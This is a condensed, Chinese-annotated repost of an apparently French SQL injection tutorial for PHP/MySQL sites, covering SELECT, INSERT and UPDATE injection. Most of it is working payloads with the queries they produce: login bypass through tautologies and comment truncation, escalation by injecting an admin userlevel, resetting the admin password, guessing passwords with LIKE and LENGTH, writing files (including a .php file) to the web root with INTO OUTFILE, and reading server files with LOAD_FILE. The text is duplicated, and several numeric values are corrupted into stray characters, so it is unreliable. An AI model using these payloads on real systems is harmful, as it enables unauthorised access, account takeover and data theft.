PHP注入.精简版本.小夜整理.有些地方我加了注释.
文章比较细致.主要介绍了三种SQL句子的注入方法.
1- select
2- insert
3- update
$req = "select * FROM membres where name like '%$search%' ORDER BY name"
où $search est la variable modifiable par l'utilisateur, venant d'un formulaire post (ou autre chose) de ce type :
<form method="POST" action="<? echo $PHP_SELF; ?>">
<input type="text" name="search"><br>
<input type="submit" value="Search">
</form>
select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
$req = "select uid FROM admins where login='$login' AND password='$pass'"
select * FROM table where 1=1
select * FROM table where 'uuu'='uuu'
select * FROM table where 1<>2
select * FROM table where 3>2
select * FROM table where 2<3
select * FROM table where 1
select * FROM table where 1+1
select * FROM table where 1--1
select * FROM table where ISNULL(NULL)
select * FROM table where ISNULL(COT(0))
select * FROM table where 1 IS NOT NULL
select * FROM table where NULL IS NULL
select * FROM table where 2 BETWEEN 1 AND 3
select * FROM table where 'b' BETWEEN 'a' AND 'c'
select * FROM table where 2 IN (0,1,2)
select * FROM table where CASE WHEN 1>0 THEN 1 END -------小猪早就开始利用了.呵呵.
select uid FROM admins where login='' OR 'a'='a' AND password='' OR 'a'='a'
select uid FROM admins where login='John' AND password='' OR 'b' BETWEEN 'a' AND 'c'
select * FROM table where nom='Jack'# commentaire
select * FROM table where nom='Jack'
select * FROM table where /* commentaires */ addresse=ཕ rue des roubys'
select * FROM table where addresse=ཕ rue des roubys'
select uid FROM admins where login='John'#' AND password=''
select uid FROM admins where login='' OR admin_level=1#' AND password=''
$req = "select password FROM admins where login='$login'"
select * FROM table INTO OUTFILE '/complete/path/to/file.txt' ----将表导出.
select password FROM admins where login='John' INTO DUMPFILE '/path/to/site/file.txt'
http://[target]/file.txt.
frog' INTO OUTFILE '/path/to/site/file.php .
$req = "select uid FROM membres where login='$login' AND password='$pass'"
select * FROM table where msg like '%hop'
select * FROM table where msg like 'hop%'
select * FROM table where msg like '%hop%'
select * FROM table where msg like 'h%p'
select * FROM table where msg like 'h_p'
select uid FROM membres where login='Bob' AND password like 'a%'#' AND password=''
select uid FROM membres where login='Bob' AND LENGTH(password)=6#' AND password=''
$req = "select email, website FROM membres where name like '%$search%' ORDER BY name"
select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
$req = "select email, website FROM membres where name like '%$search%' ORDER BY $orderby"
以上是select的注入.上面提到的.我们早已经掌握了.继续看
insert :
create TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
$query1 = "insert INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email',Ƈ')"
insert INTO membres (login,password,nom,email,userlevel) VALUES ('','','','',Ɖ')#',Ƈ')
create TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint default Ƈ',
PRIMARY KEY (id)
)
$query2 = "insert INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'"
insert INTO membres SET login='',password='',nom='',userlevel=Ɖ',email=''
create TABLE membres (
id varchar(15) NOT NULL default '',
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
$query3 = "insert INTO membres VALUES ('$id','$login','$pass','$nom','$email',Ƈ')"
insert INTO membres VALUES ('[ID]','[LOGIN]','[PASS]','[NOM]','a@a.a',Ɖ')#',Ƈ')
可见.insert注入关键是截断,)再加注释的利用.没问题.很简单吧.继续
update的利用
create TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
$sql = "update membres SET password='$pass',nom='$nom',email='$email' where id='$id'"
update membres SET password='[PASS]',nom='',userlevel=Ɖ',email=' ' where id='[ID]'
update membres SET password='[nouveaupass]' where nom='Admin'#',nom='[NOM]',email=' ' where id='[ID]'
update membres SET password='[nouveaupass]' where nom='Admin'
update membres SET password='[PASS]',nom='[NOM]',email=' ' where id='' OR name='Admin'
create TABLE news (
idnews int(10) NOT NULL auto_increment,
title varchar(50),
author varchar(20),
news text,
Votes int(5),
score int(15),
PRIMARY KEY (idnews)
)
$sql = "update news SET Votes=Votes+1, score=score+$note where idnews='$id'"
update news SET Votes=Votes+1, score=score+3, title='hop' where idnews=཈'
update news SET Votes=Votes+1, score=score+3,Votes=0 where idnews=཈'
update news SET Votes=Votes+1, score=score+3, title=char(104,111,112) where idnews=཈'
la fonction ASCII() ou ORD(). ASCII('h') et ORD('h')
update news SET Votes=Votes+1, score=score+3, title=0x616263 where idnews=཈'
select CONV("abc",16,3), CONV("abc",16,8).
DATABASE() et USER() ( ou SYSTEM_USER() ou CURRENT_USER() ou SESSION_USER() )
update news SET Votes=Votes+1, score=score+3, title=DATABASE() where idnews=཈'
update news SET Votes=Votes+1, score=score+3, news=LOAD_FILE('/tmp/picture') where idnews=཈'
文章比较细致.主要介绍了三种SQL句子的注入方法.
1- select
2- insert
3- update
$req = "select * FROM membres where name like '%$search%' ORDER BY name"
où $search est la variable modifiable par l'utilisateur, venant d'un formulaire post (ou autre chose) de ce type :
<form method="POST" action="<? echo $PHP_SELF; ?>">
<input type="text" name="search"><br>
<input type="submit" value="Search">
</form>
select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
$req = "select uid FROM admins where login='$login' AND password='$pass'"
select * FROM table where 1=1
select * FROM table where 'uuu'='uuu'
select * FROM table where 1<>2
select * FROM table where 3>2
select * FROM table where 2<3
select * FROM table where 1
select * FROM table where 1+1
select * FROM table where 1--1
select * FROM table where ISNULL(NULL)
select * FROM table where ISNULL(COT(0))
select * FROM table where 1 IS NOT NULL
select * FROM table where NULL IS NULL
select * FROM table where 2 BETWEEN 1 AND 3
select * FROM table where 'b' BETWEEN 'a' AND 'c'
select * FROM table where 2 IN (0,1,2)
select * FROM table where CASE WHEN 1>0 THEN 1 END -------小猪早就开始利用了.呵呵.
select uid FROM admins where login='' OR 'a'='a' AND password='' OR 'a'='a'
select uid FROM admins where login='John' AND password='' OR 'b' BETWEEN 'a' AND 'c'
select * FROM table where nom='Jack'# commentaire
select * FROM table where nom='Jack'
select * FROM table where /* commentaires */ addresse=ཕ rue des roubys'
select * FROM table where addresse=ཕ rue des roubys'
select uid FROM admins where login='John'#' AND password=''
select uid FROM admins where login='' OR admin_level=1#' AND password=''
$req = "select password FROM admins where login='$login'"
select * FROM table INTO OUTFILE '/complete/path/to/file.txt' ----将表导出.
select password FROM admins where login='John' INTO DUMPFILE '/path/to/site/file.txt'
http://[target]/file.txt.
frog' INTO OUTFILE '/path/to/site/file.php .
$req = "select uid FROM membres where login='$login' AND password='$pass'"
select * FROM table where msg like '%hop'
select * FROM table where msg like 'hop%'
select * FROM table where msg like '%hop%'
select * FROM table where msg like 'h%p'
select * FROM table where msg like 'h_p'
select uid FROM membres where login='Bob' AND password like 'a%'#' AND password=''
select uid FROM membres where login='Bob' AND LENGTH(password)=6#' AND password=''
$req = "select email, website FROM membres where name like '%$search%' ORDER BY name"
select * FROM membres where name like '%%' ORDER BY uid#%' ORDER BY name
$req = "select email, website FROM membres where name like '%$search%' ORDER BY $orderby"
以上是select的注入.上面提到的.我们早已经掌握了.继续看
insert :
create TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
$query1 = "insert INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email',Ƈ')"
insert INTO membres (login,password,nom,email,userlevel) VALUES ('','','','',Ɖ')#',Ƈ')
create TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint default Ƈ',
PRIMARY KEY (id)
)
$query2 = "insert INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'"
insert INTO membres SET login='',password='',nom='',userlevel=Ɖ',email=''
create TABLE membres (
id varchar(15) NOT NULL default '',
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
$query3 = "insert INTO membres VALUES ('$id','$login','$pass','$nom','$email',Ƈ')"
insert INTO membres VALUES ('[ID]','[LOGIN]','[PASS]','[NOM]','a@a.a',Ɖ')#',Ƈ')
可见.insert注入关键是截断,)再加注释的利用.没问题.很简单吧.继续
update的利用
create TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)
$sql = "update membres SET password='$pass',nom='$nom',email='$email' where id='$id'"
update membres SET password='[PASS]',nom='',userlevel=Ɖ',email=' ' where id='[ID]'
update membres SET password='[nouveaupass]' where nom='Admin'#',nom='[NOM]',email=' ' where id='[ID]'
update membres SET password='[nouveaupass]' where nom='Admin'
update membres SET password='[PASS]',nom='[NOM]',email=' ' where id='' OR name='Admin'
create TABLE news (
idnews int(10) NOT NULL auto_increment,
title varchar(50),
author varchar(20),
news text,
Votes int(5),
score int(15),
PRIMARY KEY (idnews)
)
$sql = "update news SET Votes=Votes+1, score=score+$note where idnews='$id'"
update news SET Votes=Votes+1, score=score+3, title='hop' where idnews=཈'
update news SET Votes=Votes+1, score=score+3,Votes=0 where idnews=཈'
update news SET Votes=Votes+1, score=score+3, title=char(104,111,112) where idnews=཈'
la fonction ASCII() ou ORD(). ASCII('h') et ORD('h')
update news SET Votes=Votes+1, score=score+3, title=0x616263 where idnews=཈'
select CONV("abc",16,3), CONV("abc",16,8).
DATABASE() et USER() ( ou SYSTEM_USER() ou CURRENT_USER() ou SESSION_USER() )
update news SET Votes=Votes+1, score=score+3, title=DATABASE() where idnews=཈'
update news SET Votes=Votes+1, score=score+3, news=LOAD_FILE('/tmp/picture') where idnews=཈'